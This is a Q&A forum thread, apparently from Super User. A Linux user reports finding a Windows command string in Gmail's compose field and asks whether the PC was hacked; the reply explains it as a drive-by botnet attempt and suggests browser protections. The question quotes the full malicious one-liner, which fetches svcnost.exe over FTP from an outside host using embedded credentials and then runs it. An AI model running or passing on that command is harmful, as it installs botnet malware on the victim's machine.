Linux – How to identify whether the Linux computer was hacked

linuxSecurity

My home PC is usually on, but the monitor is off. This evening I came home from work and found what looks like a hack attempt: in my browser, my Gmail was open (that was me), but it was in compose mode with the following in the TO field:

md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned

This looks like Windows command line code to me, and the md start of the code combined with the fact that Gmail was in compose mode, makes it evident that someone tried to run a cmd command. I'm guess I was lucky that I don't in fact run Windows on this PC, but I have others that do. This is the first time ever that something like this has happened to me. I'm not a Linux guru, and I wasn't running any other programs apart from Firefox at the time.

I'm absolutely sure that I didn't write this, and nobody else was physically at my computer. Also, I have recently changed my Google password (and all my other passwords) to something like vMA8ogd7bv so I don't think that someone hacked my Google account.

What just happened? How does someone put keystrokes on my computer when it's not granny's old Windows machine that has been running malware for years, but a recent new Ubuntu install?

Update:
Let me address some of the points and questions:

  • I'm in Austria, in the countryside. My WLAN router runs WPA2/PSK and a medium-strong password that's not in the dictionary; would have to be brute-force and less than 50 meters from here; it's not likely that it got hacked.
  • I'm using a USB wired keyboard, so again very unlikely that anybody could be within range to hack it.
  • I wasn't using my computer at the time; it was just idling at home while I was at work. It's a monitor-mounted nettop PC, so I rarely turn it off.
  • The machine is only two months old, only runs Ubuntu, and I'm not using weird software or visiting weird sites. It's mainly Stack Exchange, Gmail, and newspapers. No games. Ubuntu is set to keep itself up to date.
  • I'm not aware of any VNC service running; I certainly haven't installed or enabled one. I've also not started any other servers. I'm unsure if any are running in Ubuntu by default?
  • I know all the IP addresses in Gmail's account activity. I'm fairly sure Google wasn't an entryway.
  • I found a Log File Viewer, but I don't know what to look for. Help?

What I really want to know is, and what really makes me feel unsafe, is: how can anyone from the Internet generate keystrokes on my machine? How can I prevent that without being all tinfoil-hat about it? I'm not a Linux geek, I'm a father who's messed with Windows for 20+ years and am tired of it. And in all the 18+ years of being online, I've never personally seen any hack attempt, so this is new to me.

Best Answer

I doubt you have anything to worry about. It was more than likely a JavaScript attack that tried to do a drive by download. If you are concerned about this happening start using NoScript and AdBlock Plus Firefox Add-Ons.

Even visiting trustworthy sites you are not safe because they run JavaScript code from third-party advertisers that can be malicious.

I grabbed it and ran it in a VM. It installed mirc and this is the status log... http://pastebin.com/Mn85akMk

It is an automated attack that is trying to get you to download mIRC and join a botnet that will turn you into a spambot... It had my VM join and make a connection to a number of different remote addresses one of which is autoemail-119.west320.com.

Running it in Windows 7 I had to accept the UAC prompt and allow it access through the firewall.

There seems to be tons of reports of this exact command on other forums, and someone even says that a torrent file tried to execute it when it was finished downloading... I am not sure how that would be possible though.

I haven't used this myself, but it should be able to show you the current network connections so you can see if you are connected to something out of the norm: http://netactview.sourceforge.net/download.html

Related Question